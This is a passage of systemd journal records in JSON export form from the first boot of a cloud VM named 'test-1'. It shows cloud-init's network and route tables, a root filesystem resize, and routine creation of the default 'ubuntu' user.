|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25e;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=caac27a601f8a351", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | lo | True | ::1/128 | . | host | . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25f;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=3af3631cbc0f5fe1", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: 
+--------+------+------------------------------+---------------+--------+-------------------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=260;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=4a33c63bdc09703d", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: ++++++++++++++++++++++++++++++++Route IPv4 info+++++++++++++++++++++++++++++++++" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=261;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=1829d704ad756d99", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", 
"_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-----------------+--------------+-----------------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=262;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=a60f616505a8540b", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=263;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=1829d704ad756d99", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : 
"/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-----------------+--------------+-----------------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=264;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=e6c753992d003dbc", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 0 | 0.0.0.0 | 192.168.10.1 | 0.0.0.0 | ens3 | UG |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=265;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=de822f4a065b1b15", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 
/usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 1 | 169.254.169.254 | 192.168.10.2 | 255.255.255.255 | ens3 | UGH |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=266;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=2b92ad0a201ebd9e", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 2 | 192.168.10.0 | 0.0.0.0 | 255.255.255.0 | ens3 | U |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=267;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=1829d704ad756d99", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", 
"_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-----------------+--------------+-----------------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=268;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=b229ce65b1002b2b", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=269;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=a45ea851a091d2cd", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : 
"40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-------------+---------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26a;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=7f010c225ad3867e", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | Route | Destination | Gateway | Interface | Flags |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26b;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=a45ea851a091d2cd", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", 
"_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-------------+---------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26c;b=e2b08827b5804427b422c10c84f1567e;m=282f7bd;t=5bd16df467724;x=793b73d8c5f739c0", "__REALTIME_TIMESTAMP" : "1615280816420644", "__MONOTONIC_TIMESTAMP" : "42137533", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 1 | fe80::/64 | :: | ens3 | U |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26d;b=e2b08827b5804427b422c10c84f1567e;m=282f7bd;t=5bd16df467724;x=2a8bc0b4a4e1dc94", "__REALTIME_TIMESTAMP" : "1615280816420644", "__MONOTONIC_TIMESTAMP" : "42137533", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : 
"40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 3 | local | :: | ens3 | U |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26e;b=e2b08827b5804427b422c10c84f1567e;m=282f7bd;t=5bd16df467724;x=6e95665ae5a7b346", "__REALTIME_TIMESTAMP" : "1615280816420644", "__MONOTONIC_TIMESTAMP" : "42137533", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 4 | ff00::/8 | :: | ens3 | U |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26f;b=e2b08827b5804427b422c10c84f1567e;m=282f7bd;t=5bd16df467724;x=a45ea851a091d2cd", "__REALTIME_TIMESTAMP" : "1615280816420644", "__MONOTONIC_TIMESTAMP" : "42137533", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", 
"_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-------------+---------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=270;b=e2b08827b5804427b422c10c84f1567e;m=28a1619;t=5bd16df4d957f;x=df409df7f70e977c", "__REALTIME_TIMESTAMP" : "1615280816887167", "__MONOTONIC_TIMESTAMP" : "42604057", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "42603851", "MESSAGE" : "EXT4-fs (vda1): resizing filesystem from 548091 to 5214459 blocks" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=271;b=e2b08827b5804427b422c10c84f1567e;m=28d13e2;t=5bd16df509348;x=ecaad3873edaaa81", "__REALTIME_TIMESTAMP" : "1615280817083208", "__MONOTONIC_TIMESTAMP" : "42800098", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "42796587", "MESSAGE" : "EXT4-fs (vda1): resized filesystem to 5214459" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=272;b=e2b08827b5804427b422c10c84f1567e;m=2904ac5;t=5bd16df53ca2c;x=c5f38dfaad45e50", "__REALTIME_TIMESTAMP" : "1615280817293868", "__MONOTONIC_TIMESTAMP" : "43010757", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : 
"/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "MESSAGE" : "new group: name=ubuntu, GID=1000", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817293679" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=273;b=e2b08827b5804427b422c10c84f1567e;m=29057f0;t=5bd16df53d757;x=b57edda67a1f8a7b", "__REALTIME_TIMESTAMP" : "1615280817297239", "__MONOTONIC_TIMESTAMP" : "43014128", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "new user: name=ubuntu, UID=1000, GID=1000, home=/home/ubuntu, shell=/bin/bash", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817297230" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=274;b=e2b08827b5804427b422c10c84f1567e;m=2908494;t=5bd16df5403fb;x=42b5819e6566f300", "__REALTIME_TIMESTAMP" : "1615280817308667", "__MONOTONIC_TIMESTAMP" : "43025556", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : 
"0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'adm'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817308652" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=275;b=e2b08827b5804427b422c10c84f1567e;m=2908559;t=5bd16df5404c1;x=9fd82976f351aa69", "__REALTIME_TIMESTAMP" : "1615280817308865", "__MONOTONIC_TIMESTAMP" : "43025753", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", 